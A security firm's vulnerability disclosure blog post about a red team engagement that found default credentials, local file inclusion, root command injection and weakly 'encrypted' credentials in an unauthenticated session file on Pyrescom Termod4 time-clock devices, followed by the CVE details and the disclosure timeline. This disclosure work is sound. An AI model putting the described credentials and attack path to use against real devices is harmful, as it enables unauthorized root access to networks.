Multiple vulnerabilities discovered in Pyrescom Termod4 smart device
The Internet of things (IoT), cyber-physical systems, smart offices, smart homes. We are getting accustomed to these ‘smart’ concepts; lights turn off automatically when you leave home. Your car drives you, instead of the other way around and quickly scanning your access badge to check-in at work. All the little conveniences that make our lives easier, our work more productive and ever so slightly improves our lives… Until security issues bite you in the behind.
Tales from the frontline
This is a story from the frontlines by Outpost24’s OffSec team. This story took place in late 2019 while we were on-site at a customer performing a full Red team engagement - meaning we assessed physical, human and cyber security at multiple facilities of the customer to see how well they are prepared to withstand a targeted attack. After physically breaking in and digitally hacking our way through one of their offices, we were at the last and probably most tricky part: The second on-site engagement where we simulate as a malicious insider. Basically, hacking the customer from the inside, using access a regular employee or user would have to see if we could get into the systems.
We were working our way through the network, stealthily identifying hosts on the network, obtaining credentials and enumerating potential interesting network shares. As the customer environment we were targeting was a rather large enterprise, time and stealth were two dependent variables. The Red team does not want to be detected by the Blue team monitoring the network, but on the other hand you want to keep making progress. On the second day whilst performing our activities on the internal network, we spotted a web application that later turned out to be our way in.
Like a fly on the wall
When we identify a web application, we usually take a quick look, jot down its existence and potential (business) use and move on. However, this particular web application drew our attention closer. It might have been its ‘retro’ design, the copyright footer that said 2006 or its bright red logo… Whichever it was, the application piqued our interest.
A quick search taught us that the vendor provided various devices from defibrillators to time management and air quality systems. However, as we discovered this web application right before lunch, we decided to figure out what exactly we were dealing with after lunch. When we walked down the hallway on our way to have lunch, we saw it. Sitting there like a fly on the wall - a big blue box used by employees to track their time by simply swiping their badge or scanning their finger: The Pyrescom Termod. A blue timekeeping box of wonders.
Exploiting the fly
First thing we noticed was the use of default credentials. After a few guesses, the credentials appeared to be username ‘pyrescom‘ with password ‘admin’. Yep, not to be confused with admin:admin or admin:pyrescom. Meaning that it required some more guesses before we got the right credentials. Hacker’s essentials tip: Always try vendor names for credentials! Anyway, we were in. Time to explore this machine’s functionalities and see if we can get anything useful out of it.
Once logged in, we started exploring the menu options available on the Termod device. After just a few clicks we already noticed some potentially interesting things. What absolutely poked our eye was in almost every URI:
The CGI-bin directory often contains all sorts of interesting executable CGI-files, that are used to obtain content from the webserver and display it on the webpage served. The ‘fonction=’ part of the URI, which translated from French means function, changed dynamically based on what selection you made on the website. Some of the functions included are: Local Network, Distant Connection and Maintenance. You can tell why this became a whole lot more interesting. Administrative function over a physical device located in the client’s network.
When attempting to look at local logs, the first opportunity presented itself for Local File Inclusion. . When opening a log, a new part was appended to the URI: ‘changement_log=file.log&login=s|uhvfrp&password=dgplq’. By changing the filename, we could read other files, including sensitive files such as /etc/passwd. This also gave us an interesting hint for our next observation… Command injection! An added bonus, the web application seems to submit some encrypted values for username and password in every request, which is also not necessarily considered a security best practice.
If you have ever tried performing command injection vulnerabilities on hacking tutorials or starter Capture-the-flag (CTF) events, you might have come across a simple example such as the below:
By entering a (partially) legitimate command and then appending another command, malicious commands can be executed. Although in most cases, you would be hard-pressed to come across such schoolbook examples of command injection… Ladies and gentlemen; we’ve got him! We could literally enter the same command in the URI as in the example shown above to have a physical device on the network execute command on our behalf. And the best thing? The web application is run as root, providing us administrative power over the entire machine!
Simplifying our lives
Imagine working at our customer’s IT team and noticing these strange requests and weird logins on one of the Pyrescom devices. What do you do? Follow security best practice – investigate and potentially change the password to lock the bad guys out! The next day we realized this is exactly what the IT team did. We were locked out of ‘our’ Pyrescom device. Well, earlier we mentioned these password values in the URI, after being denied access to the device, we discovered something else: A file called session.txt which is available from the web interface without authentication. This file seems to contain some weird, encrypted, values which in this cased looked like the one we have seen the day before.
So, what to do from here? These values are encrypted and by now they have changed from the default (shown above) to something else. It turns out that this form of ‘encryption’ was rather primitive, after a few minutes of very intense cryptanalysis we noticed the following:
That’s right, the ‘encryption’ used here is a simple shift cipher (also known as Caesar cipher) by a negative value of three based on the associated ASCII value. Whereas the normal alphabet runs a-z, this cipher had a special character which does not occur in the normal alphabet. However, if you consider all ASCII characters it means you can have special characters directly in your 128-character long ‘alphabet’. This allowed us to retrieve the newly updated username and password straight from the session.txt file. How convenient. We were back in the game!
Come fly with me
By having root access to any of these Termod machines, we effectively had a persistent foothold in various places throughout the customer’s network. And the best thing is that they cannot keep us out! However, finding the credentials for each machine and then utilizing the remote code execution by hand would be a bit tedious. So, we decided to automate this process in one useful script. All you need to do is put in the device IP address to get the credentials and optionally add a command to be executed. Below you’ll find a screenshot of the script in usage and the PoC itself can be downloaded from the Outpost24 git repository (comes without warranty™).
CVE Details
As of 22-01-2021, the CVE IDs are released so these vulnerabilities can be referenced as CVE-2020-23160, CVE-2020-23161 and CVE-2020-23162.
CVE-2020-23160 - Remote code execution
Remote code execution in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to arbitrary commands as root on the devices. More details.
CVE-2020-23161 - Local file inclusion
Local file inclusion in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to traverse directories and read sensitive files via the Maintenance > Logs menu and manipulating the file-path in the URL. More details.
CVE-2020-23162 - Sensitive information disclosure & weak encryption
Sensitive information disclosure and weak encryption in Pyrescom Termod4 time management devices before 10.04k allows remote attackers to read a session-file and obtain plain-text user credentials. More details.
Disclosure timeline
Whenever we find a vulnerability, we will notify the vendor and work towards a solution with them before disclosing it. In doing so, we follow our responsible disclosure policy. Below the timeline of the disclosure of these vulnerabilities:
| Day # | Date | Activity |
|---|---|---|
| 0-day | 18-12-2019 | Initial contact with vendor. |
| 2 days | 20-12-2019 | Second attempt at contact with vendor. |
| 21 days | 08-01-2020 | Third attempt at contact with vendor. |
| 29 days | 16-01-2020 | Vendor meeting set-up through our customer. |
| 40 days | 27-01-2020 | Meeting with vendor and our customer, vendor acknowledged issues and received full write-up. |
| 82 days | 09-03-2020 | Update released and rolled out, performed brief re-test for our customer. Vulnerabilities resolved. |
| 83 days | 10-03-2020 | Confirmed patch effectiveness with vendor. Proposed disclosure timeline, no response from vendor. |
| 124 days | 20-04-2020 | Proposed disclosure timeline, no response from vendor. |
| 141 days | 07-05-2020 | CVE reservation requested. More than 100 days since confirmation by vendor. |
| 401 days | 22-01-2021 | Multiple requests towards Mitre for update/CVE in past 204 days. After re-submission CVE IDs were released on January 22nd. |
| 408 days | 29-01-2021 | Release of this blog, CVE IDs and PoC. |
Advice
Although the vulnerabilities have been fixed, exact details on the patch versions are unknown and not acknowledged by the vendor. We discovered the vulnerabilities in version 10.02r and verify that in version 10.04k the vulnerabilities are remediated. How intermediate releases are affected is unknown, therefore we recommend upgrading to the latest stable firmware version available for your device.
 |
About Ghost Labs Ghost Labs is the specialist security unit within Outpost24, offering enhanced security services such as advanced network penetration testing, (web)application testing, Red Teaming assessments and complex web application exploitation. In addition, the Ghost Labs team is an active contributor to the security community with vulnerability research and coordinated responsible disclosure programs. Ghost Labs performs hundreds of success penetration tests for its customers ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers, covering a wide range of advanced testing services to help companies keep up with evolving threats and new technologies. |